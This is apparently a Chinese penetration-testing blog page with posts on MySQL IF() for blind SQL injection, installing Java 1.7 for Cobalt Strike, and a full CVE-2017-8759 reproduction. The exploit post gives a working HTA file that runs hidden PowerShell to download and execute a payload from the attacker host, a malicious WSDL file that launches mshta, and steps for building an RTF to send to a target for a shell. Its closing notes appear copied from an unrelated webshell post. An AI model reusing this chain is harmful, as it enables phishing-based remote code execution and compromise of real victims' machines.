m0nst3r's blog

MySql中的IF表达式

Posted on 2017-10-17 Edited on 2020-06-03 In sqli Views: Disqus:

[TOC]

利用场景

一般为SQL盲注或时间注入在时候。
逗号,没有被过滤的情况下。

如果注入点过滤了逗号,，可用CASE表达式绕过，参考SQL注入中的CASE表达式

MySql中的IF表达式

定义参考

官方参考：MYSQL IF表达式参考
语法
1
IF(expr1,expr2,expr3)

关于返回值
3.1 如果expr1不等于0，且expr1不等于NULL，则整个表达式的结果为expr2，否则为expr3。
3.2 如果expr1，expr2中只有一个为NULL,则整个IF()表达式的返回值类型为那个非NULL表达式的类型。
3.3 默认的返回值遵守以下规则：

如果`expr2`或者`expr3`会产生一个`string`，则返回值为`string`;
如果`expr2`和`expr3`都是`string`，且任何其中一个是大小写敏感的，则返回值也是大小写敏感的；
如果`expr3`或者`expr3`产生一个浮点类型的值，则结果为一个浮点类型的值；
如果`expr2`或者`expr3`会产生一个整数，则结果为一个整数。

##举例

mysql> select if(1<0,sleep(5),sleep(2)); 0 1 +---------------------------+ | if(1<0,sleep(5),sleep(2)) row in set (2.00 sec) < pre>

Kali 配置Java 1.7

Posted on 2017-10-14 Edited on 2020-06-03 In blaa Views: Disqus:

[TOC]
##需求
Cobalt strike 用openjdk的话，不稳定，而且运行时候提示openjdk不推荐。

##更新步骤

下载JDK1.7,这个版本是比较稳定的，对于cobalt strike来说。下载地址我找到过一次，后来在也找不到了，不知道为啥。JDK1.7百度网盘地址下载在后面。
将下载的jdk1.7解压缩。
在/usr/lib/jvm下新建jdk17，将解压出来的目录移动到该目录下。

运行以下三条命令，安装JDK1.7：

1
2
3

update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk17/bin/java 1
update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk17/bin/javac 1
update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk17/bin/jar 1

配置JDK1.7为默认java：

update-alternatives --config java
There are 2 choices for the alternative java (providing /usr/bin/java).

  Selection    Path                                            Priority   Status
------------------------------------------------------------
* 0            /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java   1081      auto mode
  1            /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java   1081      manual mode
  2            /usr/lib/jvm/jdk17/bin/java                      1         manual mode

选择2。完成。

##截图

##JDK1.7下载
JDK7 百度网盘

CVE-2017-8759 + Cobalt Strike 完美复现过程笔记

Posted on 2017-09-27 Edited on 2020-06-03 In pentest Views: Disqus:

[TOC]

主要参考文章是来自Lz1y 大神的文章：http://www.lz1y.cn/wordpress/?p=799

更新记录：

最新修改与：2017年9月28日

##工具

https://github.com/Lz1y/CVE-2017-8759.git
Cobalt Strike（请自行下载）

##步骤

在kali上面，执行命令
git clone https://github.com/Lz1y/CVE-2017-8759.git
进入cobalt strike目录，执行:
./teamserver 192.168.1.9 123456
在cobalt strike目录，执行./cobaltstrike运行cobalt strike客户端。
在cobalt strike中新建Listener，类型用http的，端口输入80。

进入该目录，依次修改以下文档：
5.1 gedit cmd.jpg (先cp cmd.hta cmd.jpg)

<html>
<head>
<script language="VBScript">
Sub window_onload
    window.resizeTo 0,0
    window.MoveTo -100,-100
	const impersonation = 3
	Const HIDDEN_WINDOW = 12
	Set Locator = CreateObject("WScript.Shell")
    Locator.Run"powershell.exe -nop -w hidden -c ""IEX (new-object net.webclient).downloadstring('http://192.168.1.9:80/a')""",0,FALSE
    window.close()
end sub
</script>
<!--

<script language="VBScript">
Sub window_onload
	const impersonation = 3
	Const HIDDEN_WINDOW = 12
	Set Locator = CreateObject("WbemScripting.SWbemLocator")
	Set Service = Locator.ConnectServer()
	Service.Security_.ImpersonationLevel=impersonation
	Set objStartup = Service.Get("Win32_ProcessStartup")
	Set objConfig = objStartup.SpawnInstance_
	Set Process = Service.Get("Win32_Process")
	Error = Process.Create("powershell.exe -nop -w hidden calc.exe", null, objConfig, intProcessID)
	window.close()
end sub
</script>
-->
</head>
</html>

2 gedit exploit.txt

<definitions
    xmlns="http://schemas.xmlsoap.org/wsdl/"
    xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
    xmlns:suds="http://www.w3.org/2000/wsdl/suds"
    xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
    xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
    <portType name="PortType"/>
    <binding name="Binding" type="tns:PortType">
        <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
        <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
    </binding>
    <service name="Service">
        <port name="Port" binding="tns:Binding">
            <soap:address location="http://192.168.1.9?C:\Windows\System32\mshta.exe?http://192.168.1.9/cmd.jpg"/>
                        <soap:address location=";
                        if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
                                System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
                                System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
                        } //"/>
        </port>
    </service>
</definitions>

以上两个文档的修改要与cobalt strike相对应

设置攻击环境：
6.1 Attacks -> Web Drive-by -> Scripted Web Delivery，启动一个powershell木马，设置如下图：

点击”Launch”之后，会生成一个一句话的Powershell代码，记住其中的网址部分，填写到cmd.jpg中，替换掉url。
6.2 Attacks -> Web Drive-by -> Host File，将cmd.jpg，一定要将Mime Type修改为application/hta，此处生成的URL请填入exploit.txt中相应的位置。
6.3 Attacks -> Web Drive-by -> Host File，将exploit.txt，无需特殊设置，设置好Local URI，点击Launch，复制生成的URL。此URL为CreateRTF.py脚本-u参数使用的。
6.3 使用大神的CreatRTF.py生成一个rtf文档，url填写为Host exploit.txt时产生的url。

至此，步骤完成，将生成的rtf文档发送给目标，即可在cobalt strike teamserver上得到shell。

##注意事项

注意事项

[1] 图片路径可以是绝对路径，也可以是相对路径，如果是相对路径不要忘记./符号哦
[2] 测试PHP版本为5.5.根据大牛提示，preg_replace函数的/e选项在>5.6版本中废除，不过也有别的函数替代。思路是对的，注意函数使用。
[3] 不要长时间盯着苍老师的图片看，图有魔性~~
##参考
[1] https://www.trustwave.com/Resources/SpiderLabs-Blog/Hiding-Webshell-Backdoor-Code-in-Image-Files/
[2] https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

m0nst3r's blog

MySql中的IF表达式

利用场景

MySql中的IF表达式

定义参考

MySQL中的Information_schema介绍

Kali 配置Java 1.7

CVE-2017-8759 + Cobalt Strike 完美复现过程笔记

利用EXIFTool 隐藏WebShell

注意事项